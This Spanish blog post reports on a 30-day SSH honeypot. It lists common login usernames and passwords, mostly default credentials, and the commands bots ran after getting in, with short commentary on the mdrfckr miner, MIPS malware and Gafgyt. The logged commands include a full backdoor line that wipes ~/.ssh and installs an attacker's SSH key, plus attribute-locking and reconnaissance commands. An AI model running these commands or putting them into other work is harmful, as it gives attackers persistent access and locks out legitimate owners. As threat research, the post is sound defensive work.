¿Qué es un honeypot?
Un honeypot detecta y registra ataques cuando un atacante intenta infiltrarse en un sistema. El honeypot que discutiremos aquí es un honeypot SSH.
¿Por qué?
No tengo idea, lo hice solo con fines de investigación y satisfacción personal…
Entorno
SO: Ubuntu 24.04 LTS x86_64
Núcleo: 6.8.0-31-generic
Intentos de inicio de sesión
cat X.log | grep -c "login attempt"
11599
Hubo un total de 11,599 intentos de inicio de sesión. Dividido entre 30 días, esto significa un promedio de 386 intentos de inicio de sesión por día.
Usuarios usados
cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $2}' | sort | uniq -c | sort -nr | head
8181 root
977 345gs5662d34
359 admin
198 pi
105 0
71 ubuntu
51 ubnt
46 support
37 user
30 oracle
Como se esperaba, hay muchos ataques que apuntan a nombres de usuario habituales y por defecto.
Para el usuario 345gs5662d34
, según la Universidad de Aalborg de Dinamarca, esta podría ser la credencial por defecto para un teléfono IP Polycom CX600.
Consúltelo aquí:
SweetCam: un Honeypot para cámaras IP
Contraseñas
cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $4}' | sort | uniq -c | sort -nr | head
977 345gs5662d34
967 3245gs5662d34
246 admin
239 123456
208 password
155 0
88 root
75 raspberry
73 123
66 raspberryraspberry993311
Una vez más, la misma que la contraseña por defecto para el teléfono IP Polycom CX600.
Comandos ejecutados después del inicio de sesión
cat X.log | grep -a "CMD" | awk -F'CMD: ' '{print $2}' | sort | uniq -c | sort -nr
6775 echo -e "\x6F\x6B"
1016 cd ~; chattr -ia .ssh; lockr -ia .ssh
1016 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
320 uname -s -v -n -r -m
112 ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
87 uname -a
29 ps | grep '[Mm]iner'
29 ps -ef | grep '[Mm]iner'
29 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/ /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/
29 ifconfig
29 echo Hi | cat -n
29 cat /proc/cpuinfo
29 /ip cloud print
23 whoami
23 which ls
23 w
23 uname -m
23 uname
23 top
23 lscpu | grep Model
23 ls -lh $(which ls)
23 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
23 df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
23 crontab -l
23 cat /proc/cpuinfo | grep name | wc -l
23 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
23 cat /proc/cpuinfo | grep model | grep name | wc -l
Ahora comienza la parte interesante.
El script oinasf
La ejecución de un misterioso script, ./oinasf
, seguida de intentos para leer y mostrar el contenido ejecutable del sistema, indica una estrategia de sondeo para vulnerabilidades o información valiosa. El uso de /ip cloud print
sugiere que los bots apuntan a routers MikroTik para acceder o interrumpir servicios basados en la nube, mientras que uname -s -m
les proporciona detalles esenciales sobre el sistema operativo y la arquitectura de la máquina, valiosos para diseñar acciones posteriores adaptadas a las características del sistema. En conclusión, estos comandos representan una estrategia clara para infiltrarse, evaluar y establecer control sobre sistemas objetivo. Enfatizan la preferencia de los bots por la manipulación directa y el acceso sostenido, destacando la necesidad crítica de defensas robustas contra tácticas comunes pero potencialmente devastadoras.
El minero de criptomonedas mdrfckr
Este minero simplemente crearía un trabajo cron que eliminaría todo en la carpeta .ssh
, añadiría una única clave ssh y bloquearía a otros usuarios.
Después mataría a otros mineros si existen y tendría el campo libre.
Puede revisar este repositorio de alguien que ya fue hackeado y en cuyo servidor se usó este minero: Dump del minero de criptomonedas que se instaló en mi sistema - Github
El malware MIPS
Probablemente otro malware de arquitectura MIPS (Multiprocesador sin etapas de tubería interbloqueadas), que apunta a routers y dispositivos IoT.
Aquí hay una buena lectura y análisis del comportamiento de un malware MIPS:
Análisis de un Backdoor/Bot para la plataforma MIPS
El script Sakura.sh
Este script es parte del malware Gafgyt.
Gafgyt, también conocido como BASHLITE, es un botnet que afecta a dispositivos del Internet de las cosas (IoT) y sistemas basados en Linux. El malware busca comprometer y controlar estos dispositivos, a menudo explotando contraseñas débiles o por defecto, así como vulnerabilidades conocidas. Gafgyt existe desde 2014 y ha evolucionado en múltiples variantes, cada una con su propio conjunto de características y capacidades, incluyendo la habilidad de lanzar ataques distribuidos de denegación de servicio (DDoS).
Aquí hay Un análisis detallado del malware Gafgyt que apunta a dispositivos IoT
Discusión
Deja un Comentario
Los comentarios de invitados serán revisados antes de aparecer en el sitio.
Aún no hay comentarios. ¡Sé el primero en iniciar la discusión!